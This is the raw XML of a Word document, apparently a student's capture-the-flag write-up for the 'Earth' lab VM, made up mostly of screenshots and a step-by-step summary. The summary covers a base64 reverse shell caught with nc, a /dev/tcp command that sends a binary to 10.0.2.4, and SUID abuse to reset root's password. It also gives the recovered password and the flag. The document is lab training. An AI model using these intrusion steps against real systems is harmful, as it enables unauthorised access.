    <w:p w14:paraId="157D38D0" w14:textId="655D2292" w:rsidR="00344C90" w:rsidRPr="00286CF9" w:rsidRDefault="0004001F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41043074" wp14:editId="4AE1FB3C">
            <wp:extent cx="5731510" cy="1844040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="18421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7DA" w14:textId="5775EEB8" w:rsidR="00655FA8" w:rsidRDefault="00344C90">
      <w:r w:rsidRPr="00344C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6253E3CE" wp14:editId="3F70207C">
            <wp:extent cx="5731510" cy="2153920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49172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64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BCAD" w14:textId="41B6E63B" w:rsidR="004305E7" w:rsidRDefault="00344C90">
      <w:r w:rsidRPr="00344C90">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00344C90">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00344C90">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00344C90">
        <w:t>reset_root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00344C90">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00344C90">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00344C90">
        <w:t xml:space="preserve">/10.0.2.4 </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00344C90">
        <w:t>3333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16459231" w14:textId="79717B83" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r w:rsidRPr="0004001F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="119C4BC6" wp14:editId="78A13213">
            <wp:extent cx="5731510" cy="2355850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="13614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17D" w14:textId="77777777" w:rsidR="0004001F" w:rsidRDefault="0004001F"/>
    <w:p w14:paraId="2F8978BE" w14:textId="57EDC79F" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r w:rsidRPr="0004001F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58100BA2" wp14:editId="751EFFD9">
            <wp:extent cx="5731510" cy="1953895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="24320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10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5CE" w14:textId="4CE78D59" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r w:rsidRPr="0004001F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A267E00" wp14:editId="1F1C4ABB">
            <wp:extent cx="5731510" cy="3128645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9199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0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5612" w14:textId="77777777" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r>
        <w:t>Okay we got the root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DA2D6" w14:textId="77777777" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r w:rsidRPr="0004001F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00CD132F" wp14:editId="3100C3A1">
            <wp:extent cx="5731510" cy="2756535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="29782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272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FC18" w14:textId="77777777" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r w:rsidRPr="0004001F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EFC9E85" wp14:editId="75B8AF67">
            <wp:extent cx="5731510" cy="4596765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="124449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7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ADA6" w14:textId="77777777" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r w:rsidRPr="0004001F">
        <w:t>[root_flag_b0da9554d29db2117b02aa8b66ec492e]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF38093" w14:textId="77777777" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r>
        <w:t>Got both the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28170EA9" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“The Planets – Earth” VM: Quick-Look Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A2544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Discovery &amp; Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F945A34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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> to locate the host (e.g., 10.0.2.11).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49552EB8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 xml:space="preserve">Full port sweep with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> -p- reveals SSH (22) and HTTPS (443).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE1AAA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Virtual-Host Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081D316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Browsing https://10.0.2.11 exposes a Fedora test page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BB8F9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 xml:space="preserve">Inspecting the TLS certificate discloses hidden domains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>terratest.earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>; add them to /etc/hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E441B53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Web Content Brute-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D90416" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> uncovers /admin on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> and /robots.txt on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terratest.earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017E9E08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 xml:space="preserve">robots.txt links to testingnotes.txt, which hints at an XOR-encrypted password, a key file (testdata.txt), and the username </w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terra</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71814ACE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Password Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081FBFFF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">XOR the landing-page ciphertext with testdata.txt in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>CyberChef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> to obtain the password </w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>earthclimatechangebad4humans</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45153BBB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Initial Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA14136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Log in at https://earth.local/admin (terra / recovered password).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F8B02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The admin panel’s “Run Command” field executes shell commands as the web-server user (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4194B620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 xml:space="preserve">Deliver a base64-encoded reverse-shell, decode and pipe to bash, then catch it with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011BC0C5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User Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF028F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Inside the shell: cat /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>earth_web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>/user_flag.txt → first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1FC3E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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C6C920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find / -perm -u=s -type f reveals a custom SUID binary /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>reset_root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EB6AE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 xml:space="preserve">Download it, analyse with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>; binary only works if three temporary marker files exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52F3D2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Create those files (touch /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>/.earth /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t>/.terra /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve">/.climate) and run the binary: it resets root’s password to </w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Earth</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60AB7C" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root Access &amp; Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769F98F9" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> root (password </w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Earth</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:t>) → root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC7C12" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666605">
        <w:t>cat /root/root_flag.txt → final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F0A2DE" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> user and root flags captured, complete control gained over the Earth VM via a web-panel RCE and a misconfigured SUID helper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A76B9" w14:textId="77777777" w:rsidR="00666605" w:rsidRDefault="00666605"/>
    <w:p w14:paraId="0E912AA4" w14:textId="3D85BEBF" w:rsidR="0004001F" w:rsidRDefault="0004001F">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00040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C612A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8B81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485864"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DEE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6786015">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="212442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A1"/>
    <w:rsid w:val="0004001F"/>
    <w:rsid w:val="00176D66"/>
    <w:rsid w:val="0026008E"/>
    <w:rsid w:val="00286CF9"/>
    <w:rsid w:val="00344C90"/>
    <w:rsid w:val="004305E7"/>
    <w:rsid w:val="00447EB9"/>
    <w:rsid w:val="004E67F2"/>
    <w:rsid w:val="005664D4"/>
    <w:rsid w:val="005F38A1"/>
    <w:rsid w:val="006030D4"/>
    <w:rsid w:val="00655FA8"/>
    <w:rsid w:val="00666605"/>
    <w:rsid w:val="007D6CA2"/>
    <w:rsid w:val="00941267"/>
    <w:rsid w:val="0095714C"/>
    <w:rsid w:val="0096279E"/>
    <w:rsid w:val="00F572FE"/>
    <w:rsid w:val="00FE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C0992"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A05102E-0494-493E-AB2C-DC64947D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8A1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8A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8A1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8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8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F38A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F38A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F3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8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8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8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12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26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66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6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9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4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7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terratest.earth.local/robots.txt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10.0.2.11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11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 Chordiya</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jiya Chordiya</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-29T13:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-30T06:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>